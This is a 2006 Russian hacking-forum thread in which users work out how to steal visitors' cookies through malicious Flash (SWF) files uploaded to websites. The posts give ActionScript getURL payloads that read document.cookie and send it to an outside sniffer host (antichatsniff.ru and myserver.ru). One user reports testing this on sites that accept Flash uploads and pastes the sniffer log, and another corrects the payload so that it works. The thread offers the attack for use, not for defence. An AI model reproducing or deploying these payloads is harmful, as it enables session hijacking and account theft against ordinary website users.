Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Уязвимость swf(flash) (https://forum.antichat.xyz/showthread.php?t=23190)

ReanimatoR 27.08.2006 18:25

Уязвимость swf(flash)
 
Вопрос поднимался. Но все равно я немного не понял суть... объясните плз.
Как мона чтонить спереть через swf(даже те же самые куки, я немного просто не понял)? если допустим есть два сервера... сервер1 на нем сайт и swf выполняется без проверок, который качается с сервера 2...Сервер 2 - доступен...

qBiN 28.08.2006 09:05

флеш скрипты используются на стороне клиента как и джаваскрипты,суть состоит в том что можно из флеша сделать запрос к ввв страничке(как это делается например в ввв-казино всяких) а так же получить доступ к кукам,вот и все. RTFM ActionScript

ReanimatoR 28.08.2006 12:33

Ну как сделать чтоб он выдранные куки getURL("javascript:alert(document.cookie)")
отсылал куданить?)

qBiN 28.08.2006 21:42

Повторюсь
RTFM ActionScript
Хм,мои познания во флеше невелики но положимся на интуицию
Сперва создаем переменную,присваивает значение getURL("javascript:alert(document.cookie)") (почитай как оттуда его выдрать т.е. описание функции гетурл) далее строчка что-то типа getURL("http://myserver.ru/s.php?la="+peremennaya) s.php соответственно обыкновенный скрипт - сниффер.Вопще вроде статьи есть на секлабе...

ReanimatoR 29.08.2006 17:28

спасибо!) попробую=)

ReanimatoR 29.08.2006 17:48

сниффер через флеш=) крута=) там где закачиваются флешки, раюотает эта штука
x = getURL("javascript:alert(document.cookie)");
getURL("http://www.antichatsniff.ru/cgi/sniff.cgi?cookie="+x);

ReanimatoR 29.08.2006 19:47

во, еще вопрос...эта штука работает тока на том сервере, где находится? то есть если она скачивается и показывается на www.mysite1.ru с www.mysite2.ru - куки берутся от сюда? с mysite2?

qBiN 29.08.2006 21:21

Непонял вопроса,вопщем опять по моим способностям телепатии интерпритирую твой вопрос:
Куки будут браться с того сайта где флешка ПОКАЗЫВАЕТСЯ. Могу ошибаться,попробуй скажи,самому интересно...

ReanimatoR 29.08.2006 22:40

странно... но когда я вызываю на сайте1 флешку которая лежит на втором сайте- пишет это-
[Tue Aug 29 19:42:07 2006] IP=8*.16*.1*1.2*REFERER=http://a****h*e*a*ts.ru/index.php?pid=6 QUERY=cookie=undefined

qBiN 30.08.2006 16:59

ну так правильно,ты пытаешься присвоить переменной x значение алерта(из джавы) делай уж тогда javascript:document.cookie вот собственна,кстать появилась статья на эту тему скопипастил Mobile в наш форум(с секлаба) я нечитал т.к. неособо нужно мне,а тебе советую почитать и посмотреть что там пишут.


Время: 15:03